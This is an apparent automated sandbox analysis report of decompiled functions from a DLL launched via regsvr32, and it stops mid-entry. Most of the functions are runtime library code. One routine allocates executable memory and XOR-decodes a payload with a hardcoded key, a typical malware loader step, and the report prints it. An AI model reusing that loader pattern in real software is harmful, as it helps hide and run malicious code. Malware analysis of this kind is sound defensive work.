Source File: 00000003.00000002.324572118.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000003.00000002.324493360.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324739630.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324845757.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324853680.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324861129.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324869383.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa094f0000_regsvr32.jbxd

Similarity

API ID: Concurrency::details::EmptyQueue::StructuredWork$_aligned_msizechar_traitstype_info::_name_internal_method
String ID:
API String ID: 2899389904-0
Opcode ID: d6a9ae3060159eb32e1333261476f0ce7afd758758ec1d3e09a9f36619dac840
Instruction ID: 4182262753d11cde61ce136d390dd8f49f47c10d2f8b1cedac51a8bf85ae0f8c
Opcode Fuzzy Hash: d6a9ae3060159eb32e1333261476f0ce7afd758758ec1d3e09a9f36619dac840
Instruction Fuzzy Hash: 4421AC2291CA8381DA10EF62F86126EA760FBCEBD0F004035FA9E4775ADFADD450CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094F13A0 Relevance: 7.6, APIs: 5, Instructions: 52
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E00007FFA7FFA094F13A0(signed int __eax, long long __rcx, signed int __rdx, signed long long __r8, long long _a8, signed int _a16, signed long long _a24) {
				void* _v16;
				signed long long _v24;
				long long _v32;
				signed int _v40;

				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				if (_a16 - 0xffffffff <= 0) goto 0x94f13cd;
				E00007FFA7FFA094F9764();
				_v24 = _a16 * _a24;
				if (_v24 - 0x1000 < 0) goto 0x94f1475;
				_v40 = _a8;
				if ((_v40 & 0x0000001f) == 0) goto 0x94f1409;
				E00007FFA7FFA094F9764();
				_v16 = _v40 - 8;
				_v32 =  *_v16;
				if (_v32 - _v40 < 0) goto 0x94f1435;
				E00007FFA7FFA094F9764();
				if (_v40 - _v32 - 8 >= 0) goto 0x94f1450;
				E00007FFA7FFA094F9764();
				if (_v40 - _v32 - 0x27 <= 0) goto 0x94f146b;
				E00007FFA7FFA094F9764();
				_a8 = _v32;
				0x94f4184(); // executed
				return __eax / _a24;
			}

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFA094F13C8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFA094F1404
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFA094F1430
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFA094F144B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFA094F1466

Memory Dump Source

Source File: 00000003.00000002.324572118.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000003.00000002.324493360.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324739630.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324845757.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324853680.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324861129.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324869383.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa094f0000_regsvr32.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 5b3810bd1dfc2f7cb2c35ba7318fdc2941c7d859428b9d04d3661772caa0df3a
Instruction ID: cc9070a7a78a7eaa67110bb24599c913ebc35d9b997152b8f5799a3295aca0fa
Opcode Fuzzy Hash: 5b3810bd1dfc2f7cb2c35ba7318fdc2941c7d859428b9d04d3661772caa0df3a
Instruction Fuzzy Hash: EA21FC2661DB85C1DA60EF6AF49021AB7A4F7CD7A4F004635EADD42BA9DF3DD160CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA09509510 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 59
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 45%

			E00007FFA7FFA09509510(intOrPtr __edx, long long __rcx, void* __rdx, long long _a8, intOrPtr _a16) {
				long long _v16;
				long long _v24;
				signed int _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _t35;
				signed int _t48;
				long long _t63;
				intOrPtr _t64;
				void* _t66;
				void* _t76;
				void* _t77;

				_a16 = __edx;
				_a8 = __rcx;
				_v24 = 0;
				_t63 = "*sd<^MngnRgHP%Nlnz#_&tGXftD&<%Z?YkmM&U?jm?po)5";
				_v16 = _t63;
				_v32 = E00007FFA7FFA094F91B8(_t63, _t66, L"64", _t76, _t77);
				_v36 = E00007FFA7FFA094F91B8(_t63, _t66, L"4096", _t76, _t77);
				_t35 = E00007FFA7FFA094F91B8(_t63, _t66, L"8192", _t76, _t77);
				r9d = _v32;
				r8d = _v36 | _t35;
				VirtualAlloc(??, ??, ??, ??); // executed
				_v24 = _t63;
				if (_v24 != 0) goto 0x950958f;
				goto 0x95095f4;
				_v40 = 0;
				goto 0x95095a3;
				_v40 = _v40 + 1;
				if (_v40 - _a16 >= 0) goto 0x95095ef;
				_t64 = _v40;
				_v28 =  *(_a8 + _t64) & 0x000000ff;
				asm("cdq");
				_t48 = _v28 ^  *(_v16 + _t64) & 0x000000ff;
				 *(_v24 + _v40) = _t48;
				goto 0x9509599;
				return _t48;
			}

APIs

VirtualAlloc.KERNELBASE ref: 00007FFA09509578

Strings

*sd<^MngnRgHP%Nlnz#_&tGXftD&<%Z?YkmM&U?jm?po)5, xrefs: 00007FFA09509526
4096, xrefs: 00007FFA09509542
8192, xrefs: 00007FFA09509552

Memory Dump Source

Source File: 00000003.00000002.324572118.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000003.00000002.324493360.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324739630.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324845757.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324853680.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324861129.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324869383.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa094f0000_regsvr32.jbxd

Similarity

API ID: AllocVirtual
String ID: *sd<^MngnRgHP%Nlnz#_&tGXftD&<%Z?YkmM&U?jm?po)5$4096$8192
API String ID: 4275171209-3063897839
Opcode ID: 91190bfb5b736a4e483a359375091e0b2d421b3ba45f9d7b7fc30dabc440354d
Instruction ID: 1a20b555567d849f669fd325101234d5983dfe7c42ff25dc34c1bb1761c38350
Opcode Fuzzy Hash: 91190bfb5b736a4e483a359375091e0b2d421b3ba45f9d7b7fc30dabc440354d
Instruction Fuzzy Hash: 97210832A186818AD764CF26F49022AB7A4FBCD744F408139F68E83B59DF3CE5458F00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094F12B0 Relevance: 6.1, APIs: 4, Instructions: 51
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00007FFA7FFA094F12B0(signed int __eax, signed int __rcx, signed int __rdx, signed int _a8, signed int _a16, signed char _a24) {
				long long _v16;
				long long _v24;
				signed long long _v32;
				signed long long _v40;
				void* _t40;
				long long _t54;
				signed long long _t57;
				signed long long _t58;
				void* _t60;

				_a24 = r8b;
				_a16 = __rdx;
				_a8 = __rcx;
				_v40 = 0;
				if (_a8 != 0) goto 0x94f12de;
				goto 0x94f1397;
				_t42 = __eax % _a16;
				if (0xffffffff - _a8 >= 0) goto 0x94f12f8;
				E00007FFA7FFA094F4E7C(__eax % _a16, 0xffffffff - _a8, 0xffffffff, _t60);
				_v32 = _a8 * _a16;
				if ((_a24 & 0x000000ff) == 0) goto 0x94f137c;
				if (_v32 - 0x1000 < 0) goto 0x94f137c;
				_v24 = _v32 + 0x27;
				_t54 = _v32;
				if (_v24 - _t54 > 0) goto 0x94f133b;
				E00007FFA7FFA094F4E7C(_t42, _v24 - _t54, _t54, _t60);
				E00007FFA7FFA094F3D6C(_t54, _v24); // executed
				_v16 = _t54;
				E00007FFA7FFA094F9764();
				_t57 = _v16 + 0x00000027 & 0xffffffe0;
				_v40 = _t57;
				_t58 = _t57 * 0xffffffff;
				 *((long long*)(_v40 + _t58)) = _v16;
				goto 0x94f1392;
				_t40 = E00007FFA7FFA094F3D6C(_t58, _v32);
				_v40 = _t58;
				E00007FFA7FFA094F9764();
				return _t40;
			}

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FFA094F12F3
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFA094F1336
new.LIBCMT ref: 00007FFA094F1340

Memory Dump Source

Source File: 00000003.00000002.324572118.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000003.00000002.324493360.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324739630.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324845757.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324853680.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324861129.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324869383.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa094f0000_regsvr32.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: ff720ffcf4aede3f10a3f13f5346b42280883c8723ff7dc07c368008fd0d958a
Instruction ID: 014035a041dec758ef361d97acecd0e54a3c4c9c8ebda57f64cb3ca2d28b0b99
Opcode Fuzzy Hash: ff720ffcf4aede3f10a3f13f5346b42280883c8723ff7dc07c368008fd0d958a
Instruction Fuzzy Hash: 4D21DF2251CB86C1EA609F25F05032AB7A4FB8D7A4F004725F6ED46BE9DF6DD1648B04

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094FD748 Relevance: 4.6, APIs: 3, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E00007FFA7FFA094FD748(void* __ebp, long long __rbx, long long __rdi, long long __rsi) {
				void* _t25;
				signed long long _t45;
				signed long long _t47;
				long long _t62;
				signed long long _t63;
				signed long long _t70;
				void* _t71;
				WCHAR* _t75;

				_t45 = _t70;
				 *((long long*)(_t45 + 8)) = __rbx;
				 *((long long*)(_t45 + 0x10)) = _t62;
				 *((long long*)(_t45 + 0x18)) = __rsi;
				 *((long long*)(_t45 + 0x20)) = __rdi;
				_t71 = _t70 - 0x40; // executed
				GetEnvironmentStringsW(); // executed
				if (_t45 != 0) goto 0x94fd778;
				goto 0x94fd83b;
				_t63 = _t45;
				if ( *_t45 == 0) goto 0x94fd79d;
				_t47 = (_t45 | 0xffffffff) + 1;
				if ( *((intOrPtr*)(_t63 + _t47 * 2)) != 0) goto 0x94fd784;
				if ( *((intOrPtr*)(_t63 + _t47 * 2 + 2)) != 0) goto 0x94fd780;
				 *((long long*)(_t71 + 0x38)) = __rsi;
				 *((long long*)(_t71 + 0x30)) = __rsi;
				r9d = __ebp;
				 *((intOrPtr*)(_t71 + 0x28)) = 0;
				 *(_t71 + 0x20) = __rsi;
				E00007FFA7FFA094FD698();
				if (0 != 0) goto 0x94fd7db;
				FreeEnvironmentStringsW(_t75);
				goto 0x94fd771;
				E00007FFA7FFA094FAA18(_t47, 0); // executed
				_t57 = _t47;
				if (_t47 != 0) goto 0x94fd7f4;
				_t25 = E00007FFA7FFA094FA9DC(_t47, 0);
				goto 0x94fd7d0;
				 *((long long*)(_t71 + 0x38)) = __rsi;
				r9d = __ebp;
				 *((long long*)(_t71 + 0x30)) = __rsi;
				 *((intOrPtr*)(_t71 + 0x28)) = r14d;
				 *(_t71 + 0x20) = _t47;
				E00007FFA7FFA094FD698();
				if (_t25 != 0) goto 0x94fd825;
				E00007FFA7FFA094FA9DC(_t47, _t47);
				goto 0x94fd82f;
				E00007FFA7FFA094FA9DC(_t47, _t57);
				return FreeEnvironmentStringsW(??);
			}

0x7ffa094fd748
0x7ffa094fd74b
0x7ffa094fd74f
0x7ffa094fd753
0x7ffa094fd757
0x7ffa094fd75d
0x7ffa094fd761
0x7ffa094fd76f
0x7ffa094fd773
0x7ffa094fd778
0x7ffa094fd77e
0x7ffa094fd784
0x7ffa094fd78c
0x7ffa094fd79b
0x7ffa094fd79d
0x7ffa094fd7a5
0x7ffa094fd7b4
0x7ffa094fd7b7
0x7ffa094fd7bd
0x7ffa094fd7c4
0x7ffa094fd7ce
0x7ffa094fd7d3
0x7ffa094fd7d9
0x7ffa094fd7de
0x7ffa094fd7e3
0x7ffa094fd7e9
0x7ffa094fd7ed
0x7ffa094fd7f2
0x7ffa094fd7f4
0x7ffa094fd7f9
0x7ffa094fd7fc
0x7ffa094fd804
0x7ffa094fd80d
0x7ffa094fd812
0x7ffa094fd819
0x7ffa094fd81e
0x7ffa094fd823
0x7ffa094fd827
0x7ffa094fd855

APIs

GetEnvironmentStringsW.KERNELBASE(?,?,?,?,?,?,?,00007FFA094FA08B), ref: 00007FFA094FD761
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FFA094FA08B), ref: 00007FFA094FD7D3

Part of subcall function 00007FFA094FAA18: RtlAllocateHeap.NTDLL(?,?,?,00007FFA0950040D,?,?,00000000,00007FFA094FD8B7,?,?,?,00007FFA094FA427,?,?,?,00007FFA094FA31D), ref: 00007FFA094FAA56

FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FFA094FA08B), ref: 00007FFA094FD832

Part of subcall function 00007FFA094FA9DC: RtlReleasePrivilege.NTDLL(?,?,00000000,00007FFA094FF492,?,?,?,00007FFA094FF4CF,?,?,00000000,00007FFA094FF144,?,?,?,00007FFA094FF077), ref: 00007FFA094FA9F2
Part of subcall function 00007FFA094FA9DC: GetLastError.KERNEL32(?,?,00000000,00007FFA094FF492,?,?,?,00007FFA094FF4CF,?,?,00000000,00007FFA094FF144,?,?,?,00007FFA094FF077), ref: 00007FFA094FA9FC

Memory Dump Source

Source File: 00000003.00000002.324572118.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000003.00000002.324493360.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324739630.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324845757.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324853680.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324861129.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324869383.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa094f0000_regsvr32.jbxd

Similarity

API ID: EnvironmentStrings$Free$AllocateErrorHeapLastPrivilegeRelease
String ID:
API String ID: 2360715157-0
Opcode ID: 375de5473a6635352b8acb40982912ac5787743cf0a9cf01d580d03713d4213a
Instruction ID: 749e88c4bd7646369c2e11ae4b0d039072ccdc7aea6b42bbd6a01ce35c1e4921
Opcode Fuzzy Hash: 375de5473a6635352b8acb40982912ac5787743cf0a9cf01d580d03713d4213a
Instruction Fuzzy Hash: 5531B121E08B5385EB249F32745007A76A4FB4ABD4F488239EA9E17BC5DF3DE061C300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094F2970 Relevance: 4.5, APIs: 3, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00007FFA7FFA094F2970(void* __edx, void* __eflags, long long __rcx, long long __rdx, long long __r8, long long _a8, long long _a16, long long _a24) {
				signed int _v16;
				char _v48;
				long long _v56;
				signed long long _v64;
				signed int _v72;
				void* _t35;
				void* _t37;
				signed long long _t39;
				signed long long _t40;
				signed long long _t61;

				_t37 = __eflags;
				_t36 = __edx;
				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				_v56 = 0xfffffffe;
				_t39 =  *0x956e008; // 0x36754d591002
				_t40 = _t39 ^ _t61;
				_v16 = _t40;
				_v72 = 0;
				E00007FFA7FFA094F1760(__edx,  &_v48);
				E00007FFA7FFA094F1490(_t40, _a16);
				_v64 = _t40;
				E00007FFA7FFA094F11A0(_a24);
				E00007FFA7FFA094F2CC0(__edx, _t37, _v64 + _t40,  &_v48, _v64 + _t40, __r8); // executed
				E00007FFA7FFA094F2E90( &_v48, _a16);
				E00007FFA7FFA094F2E60( &_v48, _a24);
				E00007FFA7FFA094F16A0(__edx, _v64 + _t40, _a8,  &_v48);
				_v72 = _v72 | 0x00000001;
				return E00007FFA7FFA094F3A70(E00007FFA7FFA094F1540( &_v48), _t35, _t36, _v16 ^ _t61);
			}

APIs

char_traits.LIBCPMTD ref: 00007FFA094F29C5
type_info::_name_internal_method.LIBCMTD ref: 00007FFA094F29EC
type_info::_name_internal_method.LIBCMTD ref: 00007FFA094F29FE

Part of subcall function 00007FFA094F16A0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA094F16BC

Part of subcall function 00007FFA094F1540: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA094F1567

Memory Dump Source

Source File: 00000003.00000002.324572118.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000003.00000002.324493360.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324739630.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324845757.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324853680.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324861129.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324869383.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa094f0000_regsvr32.jbxd

Similarity

API ID: Concurrency::details::EmptyQueue::StructuredWorktype_info::_name_internal_method$char_traits
String ID:
API String ID: 652137993-0
Opcode ID: 110c28662a49dc0ce0b420f88bf91af1763c08d6580e3a8db95f45a47403bc2f
Instruction ID: fe7b9d162cf7f6350b05e1d37e7b900ccddc3eeac23454e27cc3c3338fb519f4
Opcode Fuzzy Hash: 110c28662a49dc0ce0b420f88bf91af1763c08d6580e3a8db95f45a47403bc2f
Instruction Fuzzy Hash: 3D114D2261CA8281EA10DF24F4A116BB7A0FBC97D4F505222F6DE43BA9DF3DD155CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094F1B40 Relevance: 4.5, APIs: 3, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E00007FFA7FFA094F1B40(void* __rax, long long __rcx, long long __rdx, long long __r8, long long _a8, long long _a16, long long _a24) {
				signed char _t23;

				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				if ((E00007FFA7FFA094F2250(__rax, _a8, _a16) & 0x000000ff) == 0) goto 0x94f1b97;
				E00007FFA7FFA094F18F0(__rax, _a8);
				E00007FFA7FFA094F1BF0(_a16 - __rax, _a8, _a8, _a16 - __rax, _a24);
				goto 0x94f1be0;
				r8d = 0;
				_t23 = E00007FFA7FFA094F22B0(_t31, _a8, _a24); // executed
				if ((_t23 & 0x000000ff) == 0) goto 0x94f1bdb;
				E00007FFA7FFA094F18F0(_t31, _a8);
				E00007FFA7FFA094F11E0(_t31, _a16, _a24);
				return E00007FFA7FFA094F23A0(_t31, _a8, _a24);
			}

0x7ffa094f1b40
0x7ffa094f1b45
0x7ffa094f1b4a
0x7ffa094f1b67
0x7ffa094f1b6e
0x7ffa094f1b90
0x7ffa094f1b95
0x7ffa094f1b97
0x7ffa094f1ba4
0x7ffa094f1bae
0x7ffa094f1bb5
0x7ffa094f1bc7
0x7ffa094f1be4

APIs

Part of subcall function 00007FFA094F2250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F226B
Part of subcall function 00007FFA094F2250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F227C

Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F1B6E

Part of subcall function 00007FFA094F18F0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA094F18FE

Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F1BB5
char_traits.LIBCPMTD ref: 00007FFA094F1BC7

Memory Dump Source

Source File: 00000003.00000002.324572118.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000003.00000002.324493360.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324739630.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324845757.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324853680.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324861129.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324869383.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa094f0000_regsvr32.jbxd

Similarity

API ID: Concurrency::details::Work$Base::ContextIdentityQueue$EmptyQueue::Structuredchar_traits
String ID:
API String ID: 872432861-0
Opcode ID: 231cebcbe718267e9fff52c18f272d48930a3c5afa83f06dd49d2f29f991d26b
Instruction ID: 35ee3a267d4b5a3fae358d89ffffd2e4166a9f3a559a824ba7856fcd242bb15d
Opcode Fuzzy Hash: 231cebcbe718267e9fff52c18f272d48930a3c5afa83f06dd49d2f29f991d26b
Instruction Fuzzy Hash: 2E119D6662CA82C5DA409B66F4A146B6360FBCEBC0F505036FE8E47B5ADE2ED410CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094F3F18 Relevance: 4.5, APIs: 3, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E00007FFA7FFA094F3F18(void* __ecx) {
				void* __rbx;
				void* _t12;
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;

				_t2 =  ==  ? 1 :  *0x956f1a0 & 0x000000ff;
				 *0x956f1a0 =  ==  ? 1 :  *0x956f1a0 & 0x000000ff;
				E00007FFA7FFA094F4760(1, _t12, _t17, _t18, _t19, _t20);
				if (E00007FFA7FFA094F6AC0() != 0) goto 0x94f3f47;
				goto 0x94f3f5b; // executed
				E00007FFA7FFA094FA844(_t17); // executed
				if (0 != 0) goto 0x94f3f59;
				E00007FFA7FFA094F6B1C(0);
				goto 0x94f3f43;
				return 1;
			}

0x7ffa094f3f2c
0x7ffa094f3f2f
0x7ffa094f3f35
0x7ffa094f3f41
0x7ffa094f3f45
0x7ffa094f3f47
0x7ffa094f3f4e
0x7ffa094f3f52
0x7ffa094f3f57
0x7ffa094f3f60

APIs

__isa_available_init.LIBCMT ref: 00007FFA094F3F35
__vcrt_initialize.LIBVCRUNTIME ref: 00007FFA094F3F3A

Part of subcall function 00007FFA094F6AC0: __vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00007FFA094F6AC4
Part of subcall function 00007FFA094F6AC0: __vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00007FFA094F6AC9
Part of subcall function 00007FFA094F6AC0: __vcrt_initialize_locks.LIBVCRUNTIME ref: 00007FFA094F6ACE

__vcrt_uninitialize.LIBVCRUNTIME ref: 00007FFA094F3F52

Memory Dump Source

Source File: 00000003.00000002.324572118.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000003.00000002.324493360.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324739630.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324845757.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324853680.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324861129.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324869383.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa094f0000_regsvr32.jbxd

Similarity

API ID: __isa_available_init__vcrt_initialize__vcrt_initialize_locks__vcrt_initialize_pure_virtual_call_handler__vcrt_initialize_winapi_thunks__vcrt_uninitialize
String ID:
API String ID: 3388242289-0
Opcode ID: 5d9032b98b00912ce65cde94096c8696e72d1c768cb864a179bbf2be0d6f6683
Instruction ID: 51fc37f78ac18cc2caae77c9222b545bc156d084d3d9f634c1640cb3e9d527c1
Opcode Fuzzy Hash: 5d9032b98b00912ce65cde94096c8696e72d1c768cb864a179bbf2be0d6f6683
Instruction Fuzzy Hash: 59E0C210E0C28745FE682F71B8622BA12A40F1F380F8490B9DC5E423838E0FB479A535

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA09503F70 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00007FFA7FFA09503F70() {
				long long _v24;
				long long _t5;
				intOrPtr _t7;

				_v24 = 0;
				_t7 =  *0x956fdd8; // 0x180000000
				E00007FFA7FFA09509600(_t5, "fx", _t7, "DllRegisterServer");
				_v24 = _t5;
				ExitProcess(??);
			}

0x7ffa09503f74
0x7ffa09503f84
0x7ffa09503f92
0x7ffa09503f97
0x7ffa09503f9c

APIs

ExitProcess.KERNEL32 ref: 00007FFA09503F9C

Strings

DllRegisterServer, xrefs: 00007FFA09503F7D

Memory Dump Source

Source File: 00000003.00000002.324572118.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000003.00000002.324493360.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324739630.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324845757.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324853680.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324861129.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324869383.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa094f0000_regsvr32.jbxd

Similarity

API ID: ExitProcess
String ID: DllRegisterServer
API String ID: 621844428-1663957109
Opcode ID: daa4509797ac003af5991cc102a2f8bbc2bd6225bef9e83475646ccea547d58a
Instruction ID: d6c2c55d2618ed17f39c47b12eaa21f6f339e394bc8eba6c778be90b0274ebe8
Opcode Fuzzy Hash: daa4509797ac003af5991cc102a2f8bbc2bd6225bef9e83475646ccea547d58a
Instruction Fuzzy Hash: 67D06761918A8281D6209F61F85539A63B8BB8E348F809131E58D46765DF3CF25ECB44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094FA9DC Relevance: 3.0, APIs: 2, Instructions: 19
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 68%

			E00007FFA7FFA094FA9DC(intOrPtr* __rax, void* __rcx) {
				int _t1;
				intOrPtr _t3;
				void* _t4;
				void* _t11;
				intOrPtr _t14;

				if (__rcx == 0) goto 0x94faa17;
				_t14 =  *0x956f930; // 0x9b0000, executed
				_t1 = HeapFree(_t11, ??); // executed
				if (_t1 != 0) goto 0x94faa12;
				_t3 = E00007FFA7FFA094FB34C(GetLastError(), __rax, _t14, __rcx);
				_t4 = E00007FFA7FFA094FB420(__rax);
				 *__rax = _t3;
				return _t4;
			}

0x7ffa094fa9df
0x7ffa094fa9eb
0x7ffa094fa9f2
0x7ffa094fa9fa
0x7ffa094faa04
0x7ffa094faa0b
0x7ffa094faa10
0x7ffa094faa17

APIs

